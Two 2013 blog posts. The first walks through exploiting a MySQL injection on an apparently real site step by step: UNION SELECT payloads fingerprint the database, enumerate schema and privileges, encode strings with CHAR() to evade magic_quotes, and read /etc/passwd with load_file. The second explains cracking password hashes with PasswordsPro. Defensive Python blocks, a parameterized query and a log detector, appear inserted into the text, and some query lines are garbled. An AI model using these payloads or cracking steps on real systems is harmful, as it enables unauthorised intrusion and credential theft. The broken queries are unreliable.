Friday, January 11, 2013

Real World SQL Injection

Exploiting Web 2.0, Real World SQL Injection




0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Helpful links


------------------------------------------------------

0x001 - Introduction :

SQL Injection is a technique that lets you exploit a web vulnerability to extract the content of the database and show it to the injector, thanks to an error raised while the request is processed.

------------------------------------------------------

0x010 - Global Exploiting :

Exploiting The SQL Injection Vulnerability

To exploit this vulnerability you need the following conditions :

1- Null the query

2- Get the number of columns

-> To null the query it is enough to add something that does not exist in the database

-> To find the number of columns in MySQL you can append the following to the query : '+order+by+x--

x is the number of columns you are trying to guess :

=> if the page shows normally with no errors, the number you entered is less than or equal to the real number of columns

=> if the page shows an error, the number you entered is greater than the real number of columns

now you are wondering how to know the real number of columns ; it is the number right before the first error !

Note : Don't forget the comment :

( -- or /* or # or a null byte )

i hope it's pretty clear

so build the query like this

=> ' union select 1,2,3--

1,2,3 -> number of columns

in our example the number of columns is 19 :

'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
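The column-counting step above, as an added example that is not part of the original post: a string-concatenated lookup leaks its column count through ORDER BY errors and accepts a UNION, while the parameter-bound version of the same query treats the whole input as data. It uses an in-memory sqlite3 table as a stand-in for the MySQL target so it runs offline (an assumption); the table and rows are constructed.

```python
import sqlite3

# Constructed in-memory table standing in for the vulnerable app's data.
# sqlite3 is used only because it runs offline; the post's target is MySQL.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE info(id INTEGER, name TEXT, time TEXT);
    INSERT INTO info VALUES (1, 'alice', '2013-01-11');
""")


def lookup_vulnerable(name: str):
    """String-concatenated query: whatever is injected becomes SQL."""
    sql = f"SELECT id, name, time FROM info WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(name: str):
    """Placeholder binding: the whole input is compared as one string value."""
    sql = "SELECT id, name, time FROM info WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def probe_column_count(lookup, max_columns: int = 10) -> int:
    """Replay the post's ORDER BY x method against a lookup function:
    the first x that raises an error is one past the real column count.
    Returns 0 when no x errors, i.e. when nothing about the query leaks."""
    for x in range(1, max_columns + 1):
        try:
            lookup(f"' ORDER BY {x}--")
        except sqlite3.OperationalError:
            return x - 1
    return 0
```

The concatenated lookup reports 3 columns and returns the injected UNION row; the bound lookup reports 0 and returns no rows for the same inputs.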




xx - now let's get basic info about this database

=> DataBase Name

-> you can get the name of the db with 'database()'

' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19--

The database is called "fluff2"

=> DataBase Version

-> you can get the version of the db with 'version()'

' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19--

The database version is "5"

=> DataBase UserName

-> you can get the username of the db with 'user()'

' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19--

The database username is "muu"

=> DataBase Location

-> you can get the data directory of the db with '@@datadir'

' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19--

The database is located in "/var/lib/mysql/"

xxx - Get your privileges !

Let's try any privileges (select, update, file etc...)

' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

it seems that nothing is allowed ! (these queries only show the first row of mysql.user, which is not necessarily our own account)

well , since our user is muu let's look at our privileges where user = muu

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--

we can see we got full privileges now :P




0x011 - Exploiting The Bug :

let's try now to get the database content and use it !

=> uploading a file !

to upload any file, magic_quotes must be set 'OFF'

-> what the fuck is magic_quotes ?

Magic_Quotes is a feature in PHP made to help coders and developers avoid SQL injection vulnerabilities, and it's going to be removed in PHP6 !

Well , in our Facebook case Magic_Quotes are set 'ON', so we cannot use INTO OUTFILE to upload a file !

=> Getting DB content :

to read the content of a specific column , you must use the following

' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18,19 from table--

column -> the column you want to read

table -> the table where the wanted column is located

Now you wonder : you don't know the column names or table names , so what to do ?

since it's version 5 the database must have information_schema inside

so let's exploit information_schema :

-> Get Tables :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

Like you see, it's showing the name of the table | database

but only one table appears ! what to do to show the rest ?

change concat into group_concat ; the exploit then looks like this :

' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

well, it's showing some more, but this is not all

let's try something different !

add LIMIT 1 OFFSET 44 at the end of our current exploit, before the comment :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--

change the '44' to another number and it will show another table

Now you wonder how to get the table columns ?!

Alright , you can get the table columns from information_schema.columns like the following

from+information_schema.columns+where+table_name="table_name"

so our exploit becomes like this :

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name='info'--

since Magic_Quotes are set to 'ON' we must convert the table name to ASCII with CHAR()

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--

Bingo ! this is one column

to show the others use 'limit 1 offset'

You can see the content of any column =)

For now let's try to look for a specific table or a specific column !

you can get it using

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like time--

Note : time is the column you are looking for

and don't forget to convert the column name to ASCII because magic_quotes are on

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

To see other info about the column, concatenate 'column_name' with table_schema and table_name

' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--




update fluff2 set time=alphanix where

Bingo ! You can see column , db , table , and look for any column ,

pretty easy, isn't it ?

=> Reading Any File content :

since we have file loading privileges , we can load any file

on the server (it must have the right permissions) and show it !

' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--

and convert to ASCII

' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--

here we loaded the '/etc/passwd' file , i would like to

get the shadow but i don't have root privileges

=> Updating the database :

since we got the update privilege we can change the value

of any field in the db !

the update query looks like the following :

' update table_name set column_name='new value' where column_name='value' where user=muu

never forget to convert to ASCII xD
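Detection logic for the information_schema enumeration, CHAR() encoding, load_file and mysql.user queries above (and the ORDER BY probing from 0x010), as an added example that is not from the original post: it URL-decodes each request in constructed access-log lines and reports which of the post's techniques each client used. The log lines, paths and IP addresses are made up for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the techniques walked through in the post (case-insensitive).
SIGNATURES = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "order_by_probe": re.compile(r"order\s+by\s+\d+", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+", re.I),
    "file_read": re.compile(r"load_file\s*\(", re.I),
    "db_fingerprint": re.compile(r"@@datadir|\b(version|database|user)\s*\(\s*\)", re.I),
    "privilege_read": re.compile(r"mysql\.user\b", re.I),
}

# Common Log Format: client ip, method, request target and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')


def classify_request(url: str) -> list:
    """URL-decode the request target (the post's payloads use + for spaces
    and %27 for the quote) and return the names of the matching signatures."""
    decoded = unquote_plus(url)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(lines) -> dict:
    """Group suspicious requests by client: which techniques were used and
    how many ORDER BY probes (the column-counting step) were seen."""
    report = defaultdict(lambda: {"hits": [], "order_by_probes": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        tags = classify_request(m["url"])
        if not tags:
            continue
        entry = report[m["ip"]]
        entry["hits"].append((m["status"], tags))
        if "order_by_probe" in tags:
            entry["order_by_probes"] += 1
    return dict(report)


# Constructed sample lines mirroring the post's payloads (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jan/2013:10:01:02 +0000] "GET /item.php?id=1%27+order+by+19-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Jan/2013:10:01:04 +0000] "GET /item.php?id=1%27+order+by+20-- HTTP/1.1" 500 301',
    '10.0.0.5 - - [11/Jan/2013:10:01:09 +0000] "GET /item.php?id=1%27+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19-- HTTP/1.1" 200 640',
    '10.0.0.5 - - [11/Jan/2013:10:02:30 +0000] "GET /item.php?id=1%27+union+select+1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=CHAR(105,110,102,111)-- HTTP/1.1" 200 655',
    '10.0.0.5 - - [11/Jan/2013:10:03:00 +0000] "GET /item.php?id=1%27+union+select+1,2,3,4,5,6,7,load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),9,10,11,12,13,14,15,16,17,18,19+from+mysql.user-- HTTP/1.1" 200 2048',
    '192.168.1.7 - - [11/Jan/2013:10:03:05 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512',
]
```

A 500 on an ORDER BY probe followed by a 200 on a UNION SELECT from the same client is the error-based column counting the post describes; the benign request from the second client produces no entry.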

------------------------------------------------------

0x101 - Conclusion :

60% of scripts are vulnerable to SQL injection , and it's really important

to learn how to protect ourselves from it and write more secure scripts


0x110 - Additional Useful Link :

http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Monday, January 7, 2013

How to use Passwords Pro

My tutorial will show you the 3 easiest functions to make use of a Dictionary attack and a Hybrid attack

Before we begin, you will need the following:

1. PasswordsPro
2. A wordlist (Multiple lists are suggested)
3. A Brain
4. Patience

To begin I will show you a Dictionary Attack

Note: The algorithm depends on your Hash.

1. Open PasswordsPro


2. Click Options
3. Click Hashing Modules, Right Click, Add
4. Browse to your PasswordsPro Folder


5. Open the Modules folder, press CTRL+A, deselect the 2 folders.


6. Press OK
7. Click Dictionaries, right click, Add



8. Select your dictionaries (ensure you click All files). For this I'll be using MoPList.dic; click OK etc etc



9. Note: time to input your hashes. This can be done in multiple ways; I will only be showing the MANUAL way.
Right click one of the cells, click Add


10. Insert your hash. I will be using this hash :

10af61c65f34b24a1c591ca77eff73c0:10blah


Note: just to show you how I would usually do it


11. Select your type of attack: Simple Dictionary

12. Press Start
13. The program will then work on cracking your hashes.
14. As you can see, the program has found one of my passwords.


15. Enjoy =)
Note: you are never 100% guaranteed to find a password

Hybrid Attack

Simply follow the steps above, but at Step 7 press Hybrid Dictionary Attack


And as you can see, I have found another password =)
